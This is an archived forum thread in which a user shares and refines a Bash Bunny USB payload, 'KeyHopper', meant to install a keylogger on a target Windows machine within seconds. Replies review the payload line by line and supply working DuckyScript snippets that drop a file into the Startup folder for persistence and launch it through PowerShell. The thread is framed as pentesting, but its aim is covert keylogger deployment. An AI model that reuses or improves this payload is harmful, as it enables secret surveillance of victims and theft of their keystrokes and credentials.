C1PH3R Posted February 11, 2018 Share Posted February 11, 2018 Link to GitHub: https://github.com/CIPH3R0/bashbunny-payloads/tree/master/payloads/library/KeyHopper The way to have a keylogger installed in seconds! Tell me what you think! C1PH3R "Don't look at the branch of the problem, look at the root (C1PH3R)" Link to comment Share on other sites More sharing options...
GermanNoob Posted February 12, 2018 Share Posted February 12, 2018 Hi @C1PH3R, I had a look at your payload and as you asked for, here are some minor remarks / suggestions: Line 29-31 Since Darren's WAIT I prefer that at this moment of the payload. It speeds up things if you don't know the performance of your target in advance... line 32-35 Not sure why UAC should be triggered in this moment. Seems to me that you entered a command before that you have deleted? Line 43-46 Why don't you use here "RUN WIN POWERSHELL" as you did before on line 37 Line 52 & 55 Instead of forcing the user to do changes within the payload, I suggest to to use a variable for "service host.txt" in the config part. Best regards! Link to comment Share on other sites More sharing options...
C1PH3R Posted February 13, 2018 Author Share Posted February 13, 2018 On 2/12/2018 at 8:46 AM, GermanNoob said: Hi @C1PH3R, I had a look at your payload and as you asked for, here are some minor remarks / suggestions: Line 29-31 Since Darren's WAIT I prefer that at this moment of the payload. It speeds up things if you don't know the performance of your target in advance... line 32-35 Not sure why UAC should be triggered in this moment. Seems to me that you entered a command before that you have deleted? Line 43-46 Why don't you use here "RUN WIN POWERSHELL" as you did before on line 37 Line 52 & 55 Instead of forcing the user to do changes within the payload, I suggest to to use a variable for "service host.txt" in the config part. Best regards! * Line 29-31 if you want you can add that yourself but when/if I am pentesting I would rather not have to change the switch position. * Line 32-35 Yeah that was a previous command that I removed (is edited now) * Line 43-46 Because I am using a CNTRL v command that prevents me from doing that (CNTRL v pastes the drive letter of the bunny.) * Line 52 & 55 I was trying that but I could not get a variable to work with a string instead of numbers suggestions would be great! Link to comment Share on other sites More sharing options...
GermanNoob Posted February 13, 2018 Share Posted February 13, 2018 3 hours ago, C1PH3R said: * Line 52 & 55 I was trying that but I could not get a variable to work with a string instead of numbers suggestions would be great! well, this should work: Q STRING 'payloads\'$variable "'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'" Q STRING "start 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\"$variable"\'" Link to comment Share on other sites More sharing options...
C1PH3R Posted February 13, 2018 Author Share Posted February 13, 2018 Yeah, I have tried that, but it does not type the variable out. that's the problem Link to comment Share on other sites More sharing options...
GermanNoob Posted February 13, 2018 Share Posted February 13, 2018 well, I tested them in a windows vm and this short test payload works fine with both lines: LED SETUP variable=TEST LED ATTACK ATTACKMODE HID WAIT RUN WIN powershell sleep 1 Q STRING "start 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\"$variable"\'" LED FINISH Link to comment Share on other sites More sharing options...
C1PH3R Posted February 15, 2018 Author Share Posted February 15, 2018 On 2/13/2018 at 9:17 PM, GermanNoob said: well, I tested them in a windows vm and this short test payload works fine with both lines: LED SETUP variable=TEST LED ATTACK ATTACKMODE HID WAIT RUN WIN powershell sleep 1 Q STRING "start 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\"$variable"\'" LED FINISH Ahh, I see my problem (At least I think) I used: variable="TEST" I've made some edits so it should all be fine now! Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.